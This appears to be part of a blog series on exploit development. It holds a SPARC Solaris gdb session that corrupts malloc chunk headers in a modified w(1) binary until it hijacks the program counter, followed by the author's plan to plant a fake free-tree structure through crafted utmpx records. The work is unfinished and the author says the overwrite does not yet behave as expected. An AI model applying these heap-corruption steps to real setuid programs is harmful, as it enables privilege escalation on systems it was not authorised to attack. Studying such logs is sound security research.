0xff2c251c <realfree+272>:      ld  [ %i2 + 0x4a8 ], %o0
0xff2c2520 <realfree+276>:      add  %i3, %o7, %g1
0xff2c2524 <realfree+280>:      ld  [ %o0 ], %o0
0xff2c2528 <realfree+284>:      add  %g1, 0x10, %o1
0xff2c252c <realfree+288>:      cmp  %o1, %o0
0xff2c2530 <realfree+292>:      bne  0xff2c2544 <realfree+312>
0xff2c2534 <realfree+296>:      ld  [ %i2 + 0x4ac ], %o0
0xff2c2538 <realfree+300>:      st  %i3, [ %o0 ]
0xff2c253c <realfree+304>:      b  0xff2c265c <realfree+592>
0xff2c2540 <realfree+308>:      ld  [ %g1 + 8 ], %o0
0xff2c2544 <realfree+312>:      cmp  %o4, 0
0xff2c2548 <realfree+316>:      be  0xff2c2654 <realfree+584>
0xff2c254c <realfree+320>:      add  %i3, 0x20, %o1
0xff2c2550 <realfree+324>:      mov  %o4, %g1
(gdb) x/16i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>:      clr  [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>:      ld  [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>:      call  0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>:      mov  %i0, %o0
0xff2c24e4 <realfree+216>:      ld  [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>:      mov  %i0, %i3
0xff2c24ec <realfree+224>:      ld  [ %i0 ], %o1
0xff2c24f0 <realfree+228>:      ld  [ %i1 ], %o4
0xff2c24f4 <realfree+232>:      add  %o0, 8, %o0
0xff2c24f8 <realfree+236>:      add  %o1, %o0, %o0
0xff2c24fc <realfree+240>:      st  %o0, [ %i0 ]
0xff2c2500 <realfree+244>:      clr  [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>:      ld  [ %i3 ], %o0
0xff2c2508 <realfree+252>:      clr  [ %i3 + 0x18 ]
0xff2c250c <realfree+256>:      clr  [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>:      clr  [ %i3 + 8 ]
(gdb) x/17i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>:      clr  [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>:      ld  [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>:      call  0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>:      mov  %i0, %o0
0xff2c24e4 <realfree+216>:      ld  [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>:      mov  %i0, %i3
0xff2c24ec <realfree+224>:      ld  [ %i0 ], %o1
0xff2c24f0 <realfree+228>:      ld  [ %i1 ], %o4
0xff2c24f4 <realfree+232>:      add  %o0, 8, %o0
0xff2c24f8 <realfree+236>:      add  %o1, %o0, %o0
0xff2c24fc <realfree+240>:      st  %o0, [ %i0 ]
0xff2c2500 <realfree+244>:      clr  [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>:      ld  [ %i3 ], %o0
0xff2c2508 <realfree+252>:      clr  [ %i3 + 0x18 ]
0xff2c250c <realfree+256>:      clr  [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>:      clr  [ %i3 + 8 ]
0xff2c2514 <realfree+264>:      st  %i3, [ %i3 + %o0 ]
(gdb) x/x $i3
0x33050:        0xffbf0900
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 4 at 0xff2c1dc8
(gdb) c
Continuing.

Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/x Lfree
0x33028:        0x00000000
(gdb) x/x Lfree-8
0x33020:        0x00002009
(gdb) c
Continuing.

Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.

Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) del 4
(gdb) c
Continuing.

Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 5 at 0xff2c1dc8
(gdb) c
Continuing.

Breakpoint 5, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/x Lfree
0x33028:        0x00000000
(gdb) x/x &Lfree
0xff34284c <Lfree>:     0x00033028
(gdb) x/x Lfree
0x33028:        0x00000000
(gdb) x/x Lfree-8
0x33020:        0x00002009
(gdb) shell
This shell is interactive
bazz@blade72[pts/3][~] ls -l /var/adm/utmpx
-rw-r--r-- 1 root root 11K Nov  1 19:47 /var/adm/utmpx
bazz@blade72[pts/3][~] which ls
/home/bazz/tools/bin/ls
bazz@blade72[pts/3][~] /bin/ls -l /var/adm/utmpx
-rw-r--r--   1 root     root       10416 Nov  1 19:47 /var/adm/utmpx
bazz@blade72[pts/3][~] exit
exit
(gdb) p/x $i0
$5 = 0xb
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#3  0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#4  0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#5  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6  0x00011e8c in main ()
#7  0x00011144 in main ()
(gdb) x/x Lfree-8
0x33020:        0x00002009
(gdb) x/x 0x35028
0x35028:        0x6c627574
(gdb) x/x 0x35028+8
0x35030:        0x00000918
(gdb) x/96x 0x35000
0x35000:        0x00000000      0x00000000      0x00000000      0x00000000
0x35010:        0x00000000      0x00000000      0x00000000      0x00000000
0x35020:        0x00000000      0x64687572      0x6c627574      0x00000000
0x35030:        0x00000918      0x00000000      0x00000000      0x00000000
0x35040:        0x00000000      0x00000000      0x00000000      0x00000000
0x35050:        0x00000000      0x00000000      0x00000000      0x00000000
0x35060:        0x00000000      0x00000000      0x00000000      0x00000000
0x35070:        0x00000000      0x00000000      0x00000000      0x00000000
0x35080:        0x00000000      0x00000000      0x00000000      0x00000000
0x35090:        0x00000000      0x00000000      0x00000000      0x00000000
0x350a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35100:        0x00000000      0x00000000      0x00000000      0x00000000
0x35110:        0x00000000      0x00000000      0x00000000      0x00000000
0x35120:        0x00000000      0x00000000      0x00000000      0x00000000
0x35130:        0x00000000      0x00000000      0x00000000      0x00000000
0x35140:        0x00000000      0x00000000      0x00000000      0x00000000
0x35150:        0x00000000      0x00000000      0x00000000      0x00000000
0x35160:        0x00000000      0x00000000      0x00000000      0x00000000
0x35170:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb) set *0x35030 = 0x41000918
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1  0xff2c2d88 in cleanfree () from /usr/lib/libc.so.1
#2  0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
#3  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#4  0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#5  0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#6  0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#7  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#8  0x00011e8c in main ()
#9  0x00011144 in main ()
(gdb) p/x $i2
$6 = 0xff33c008
(gdb) x/i 0xff2c2514
0xff2c2514 <realfree+264>:      st  %i3, [ %i3 + %o0 ]
(gdb) p/x $i3
$7 = 0x33020
(gdb) p/x $o0
$8 = 0x41002928
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 5, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) del 5
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.
  8:38pm  up 595 day(s),  6:47,  4 users,  load average: 0.00, 0.01, 0.02
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm  1:26                /home/bazz/w_32
bazz     pts/2         7:23pm  1:04                /home/bazz/w_32
bazz     pts/3         7:34pm           57     48  /home/bazz/w_32
bazz     pts/4         7:47pm    48      1         /home/bazz/tools/bin/bash

Program exited normally.
(gdb) c
The program is not being run.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/x 0x35030
0x35030:        0x00000918
(gdb) set *0x35030 = 0xffffffc8
(gdb) set *0x35000 = 0xfffffff8
(gdb) set *0x35004 = 0x41414141
(gdb) set *0x35008 = 0xff3ee248
(gdb) set *0x3500c = 0x41414141
(gdb) set *0x35010 = 0xffffffff
(gdb) set *0x35014 = 0x41414141
(gdb) set *0x35018 = 0x41414141
(gdb) set *0x3501c = 0x41414141
(gdb) set *0x35020 = 0xffbeef08
(gdb) set *0x35024 = 0x41414141
(gdb) set *0x35028 = 0x41414141
(gdb) set *0x3502c = 0x41414141
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2890 in t_delete () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c2890 in t_delete () from /usr/lib/libc.so.1
#1  0xff2c24b4 in realfree () from /usr/lib/libc.so.1
#2  0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#3  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#4  0xff2b624c in calloc () from /usr/lib/libc.so.1
#5  0xff2d4a4c in _tzload () from /usr/lib/libc.so.1
#6  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#7  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#8  0x00011e8c in main ()
#9  0x00011144 in main ()
(gdb) x/i 0xff2c2890
0xff2c2890 <t_delete+56>:       st  %o1, [ %o0 + 0x20 ]
(gdb) p/x $o0
$9 = 0xff3ee248
(gdb) p/x $o0+20
$10 = 0xff3ee25c
(gdb) x/x 0xff3ee25c
0xff3ee25c:     Cannot access memory at address 0xff3ee25c
(gdb) shell
This shell is interactive
bazz@blade72[pts/3][~] nm -x /lib/ld.so
ld.so    ld.so.1
bazz@blade72[pts/3][~] nm -x /lib/ld.so
ld.so    ld.so.1
bazz@blade72[pts/3][~] nm -x /lib/ld.so.1 | grep jmp
nm: invalid option -- x
Usage: nm [option(s)] [file(s)]
 List symbols in [file(s)] (a.out by default).
 The options are:
  -a, --debug-syms       Display debugger-only symbols
  -A, --print-file-name  Print name of the input file before every symbol
  -B                     Same as --format=bsd
  -C, --demangle[=STYLE] Decode low-level symbol names into user-level names
                          The STYLE, if specified, can be `auto' (the default),
                          `gnu', `lucid', `arm', `hp', `edg', `gnu-v3', `java'
                          or `gnat'
      --no-demangle      Do not demangle low-level symbol names
  -D, --dynamic          Display dynamic symbols instead of normal symbols
      --defined-only     Display only defined symbols
  -e                     (ignored)
  -f, --format=FORMAT    Use the output format FORMAT.  FORMAT can be `bsd',
                           `sysv' or `posix'.  The default is `bsd'
  -g, --extern-only      Display only external symbols
  -l, --line-numbers     Use debugging information to find a filename and
                           line number for each symbol
  -n, --numeric-sort     Sort symbols numerically by address
  -o                     Same as -A
  -p, --no-sort          Do not sort the symbols
  -P, --portability      Same as --format=posix
  -r, --reverse-sort     Reverse the sense of the sort
  -S, --print-size       Print size of defined symbols
  -s, --print-armap      Include index for symbols from archive members
      --size-sort        Sort symbols by size
      --special-syms     Include special symbols in the output
      --synthetic        Display synthetic symbols as well
  -t, --radix=RADIX      Use RADIX for printing symbol values
      --target=BFDNAME   Specify the target object format as BFDNAME
  -u, --undefined-only   Display only undefined symbols
  -X 32_64               (ignored)
  @FILE                  Read options from FILE
  -h, --help             Display this information
  -V, --version          Display this program's version number

nm: supported targets: elf32-sparc-sol2 elf64-sparc-sol2 a.out-sunos-big elf64-little elf64-big elf32-little elf32-big srec symbolsrec verilog tekhex binary ihex
bazz@blade72[pts/3][~] nm /lib/ld.so.1 | grep jmp
00030234 d thr_jmp_table
bazz@blade72[pts/3][~] exit
exit
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35030 = 0xffffffc8
(gdb) set *0x35000 = 0xfffffff8
(gdb) set *0x35004 = 0x41414141
(gdb) set *0x35008 = 0xff3e0214
(gdb) set *0x3500c = 0x41414141
(gdb) set *0x35010 = 0xffffffff
(gdb) set *0x35014 = 0x41414141
(gdb) set *0x35018 = 0x41414141
(gdb) set *0x3501c = 0x41414141
(gdb) set *0x35020 = 0xffbeef08
(gdb) set *0x35024 = 0x41414141
(gdb) set *0x35028 = 0x41414141
(gdb) set *0x3502c = 0x41414141
(gdb) c
Continuing.

Program received signal SIGILL, Illegal instruction.
0xffbeef08 in ?? ()
(gdb)

Hacking a temporary “W(1)” — pt. 9

# Build the modified w(1) source: -L adds /opt/csw/lib to the link-time
# library search path and -lintl links against libintl.
gcc -L/opt/csw/lib w_hacked.c -lintl
# Point the runtime linker at the same directory for processes started from
# this shell.
# NOTE(review): runtime linkers generally restrict LD_LIBRARY_PATH for
# set-uid programs, so this setting is for the locally built test binary.
export LD_LIBRARY_PATH="/opt/csw/lib"

In order to do this exploit properly, 2 UTMPX entries will need to be used. 1 is the “last” one in the table, and it must be pre-destined before takeoff; in other words, it must be set up before calling “W.” It is where the fake TREE structure will go. The FAKE tree struct is 0x30 (48 decimal) bytes.

struct utmpx {
        char    ut_user[32];            /* user login name */
        char    ut_id[4];               /* inittab id */
        char    ut_line[32];            /* device name (console, lnxx) */

Wow!! What luck! 36 bytes, just enough to fit in the best data available to mankind before the line variable, which is a real POTA to get by the checks..NICE..

/*
 * utmpx accounting record, quoted from <utmpx.h>.  The sizeof test program
 * on this page reports 0x174 bytes for this layout on the author's build.
 *
 * NOTE(review): records are read back from a file, so a consumer should
 * treat every field as untrusted input.  The char arrays are fixed-size and,
 * by the usual utmpx convention, not guaranteed to be NUL-terminated; bound
 * every copy and comparison by the array size and validate ut_syslen
 * against sizeof(ut_host) before using it.
 */
struct utmpx {
        char    ut_user[32];            /* user login name */
        char    ut_id[4];               /* inittab id */
        char    ut_line[32];            /* device name (console, lnxx) */
        pid_t   ut_pid;                 /* process id */
        short   ut_type;                /* type of entry */
#if !defined(_XPG4_2) || defined(__EXTENSIONS__)
        struct exit_status ut_exit;     /* process termination/exit status */
#else
        struct ut_exit_status ut_exit;  /* process termination/exit status */
#endif
        struct timeval ut_tv;           /* time entry was made */
        int     ut_session;             /* session ID, used for windowing */
#if !defined(_XPG4_2) || defined(__EXTENSIONS__)
        int     pad[5];                 /* reserved for future use */
#else
        int     __pad[5];               /* reserved for future use */
#endif
        short   ut_syslen;              /* significant length of ut_host */
                                        /*   including terminating null */
        char    ut_host[257];           /* remote host name */
};

Need to get proper size…

-bash-3.00$ cat sizeof_struct_tmpx.c
#include <stdio.h>
#include <utmpx.h>

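/*
 * Print sizeof(struct utmpx) in hex so the record size used in these notes
 * can be checked against the local <utmpx.h>.
 *
 * Returns 0.
 */
int main(void)
{
  /* sizeof yields a size_t; cast it so the argument matches the %lx
     conversion on both 32-bit and 64-bit builds. */
  printf("sizeof struct utmpx = 0x%lx\n", (unsigned long)sizeof(struct utmpx));
  return 0;
}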
-bash-3.00$ ./sizeof_struct_tmpx
sizeof struct utmpx = 0x174

The 2nd structure.. well all it really needs to hold is something in the first word ; )
0x174 + 8 .. The +8 is on account of the malloc behavior..
(0x17c ^ 0xFFFFFFFF) + 1 = 0xFFFFFE84 (the two's-complement negation of 0x17c) <- that's the value for the 2nd UTMPX entry name field. Anything else there is junk. Welp, I leave off realizing, oddly, that the heap over-write point is about 17 utmpx entries further along than anticipated... and.. the written value isn't doing what I expect.. so I need to go through it in the debugger... for another day...
